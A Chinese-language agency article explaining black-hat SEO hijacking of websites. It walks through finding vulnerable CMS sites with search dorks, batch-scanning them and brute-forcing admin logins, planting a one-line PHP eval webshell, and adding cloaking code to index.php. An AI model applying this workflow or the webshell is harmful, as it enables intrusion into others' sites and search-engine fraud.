劫持,一種古(guo)老(shi)的黑帽手法,差不多10年的時候就有一票前輩知道這個方法了。
劫持分很多種,流量劫持、快照劫持、PR劫持等,其實前幾個步驟都一樣,就是最后的腳本寫的不一樣而已。
因為是劫持別人的站,所以首先要獲取劫持站的后臺權限,并留下后門,以便日后管理,這個過程就是常說的拿站(webshell)。
被劫持的多是企業站,企業站大多采用開源系統,很多系統因本身的問題存在諸多安全隱患,比如虐心的dede。有些系統的漏洞已經曝光出來,找到這些漏洞的特征和這個漏洞對應的系統,然后去各種渠道搜集使用這個系統的網站,遍歷掃描每個站,如果存在這個漏洞,就暴力破解后臺賬戶名和密碼。
搜集目標網站,最簡單的方法是拿漏洞的特征做關鍵詞到搜索引擎去搜,然后把搜索結果頁上的網站全部抓下來。關鍵詞比如:
用戶登陸 inurl:admin/login.asp 有限公司--Powered by ASPCMS V2.0 inurl:HomeMarket.asp Powered by DEDECMS ……
然后拿抓下來的這些站去掃漏洞,用很多現成的拿站工具可以完成批量的掃描和破解,然而每個工具不能能覆蓋所有漏洞,所以需要交叉使用:
御劍后臺掃描 椰樹WEB漏洞掃描器 wwwscan GUI版 Web應用安全漏洞檢測工具 web掃描工具-WVS Pker多線程后臺極速掃描器 Acunetix Web Vulnerability Scanner 8
如果順利的話,就可以拿到一些站的后臺賬戶及密碼,就可以正常登陸了。此時需要留一個后門,在網站后臺新建一個php文件,寫入一句話木馬:<?php eval($_POST['ee']); ?>,通過菜刀(一個非常好用而又強大的webshell管理軟件,如“中國菜刀”)添加shell,無異常的話就已經順利的拿下一個站了。
接下來在后臺寫入劫持代碼,比如要劫持首頁,在后臺找一個很隱蔽的地方新建一個php文件,寫入類似的代碼:
意思很簡單,若蜘蛛來訪,則抓取 http://www.mydomain1.com的內容;若來路為搜索引擎,則返回http://www.mydomain2.com的內容。之后在首頁文件index.php中調用剛才新建的文件:
<?php include(“{新建文件的路徑}") ?>
當然,http://www.mydomain1.com 和 http://www.mydomain2.com 可以設為同一個網址。
這就是快照劫持的步驟,被劫持的站,對蜘蛛訪問返回http://www.mydomain1.com的內容,對從搜索引擎搜索過來的用戶返回http://www.mydomain2.com的內容,若直接輸入網站url,則是本來的頁面。有些網站管理員只輸入url訪問網站,index.php也很少關注,所以好長時間才發現已經被劫持了。
有時在百度中搜索某些違禁詞,出現一堆政府的網站,點進去是看到各種違禁內容(百度站長平臺還專門開了一個“bad case”的帖子專門收集類似的案例),直接輸入網址訪問,卻是正常的內容,若果換一個搜索詞從百度點進去,還是正常的內容。這就是在上面劫持代碼的基礎上,根據referer詞來判斷是否返回指定頁面,現在百度已經取消referer參數了,所以這東西也就隨之失效了。
若是PR劫持,就是對蜘蛛301到指定的網站,從而提升權重。有些新站,做了不到3個月,用站長工具一查,好牛逼,權重值都在3往上,但網站本身并沒多少內容和收錄,這種情況多用此法。
上面僅是科普下劫持原理,仍有大量細節沒有展開,比如如何隱蔽蹤跡,如何批量管理webshell。如果藏的不是非常隱蔽,基本都會被發現,只是時間長短問題,且作上去的排名都活不了太長時間,說白了,能獲得多大效果,取決于能鋪多少量,是個耗費精力、時間的力氣活。
來源:本文由 點通網絡原創撰寫,歡迎分享本文,轉載請保留出處和鏈接! 分享:
*請認真填寫需求信息,我們會在24小時內與您取得聯系。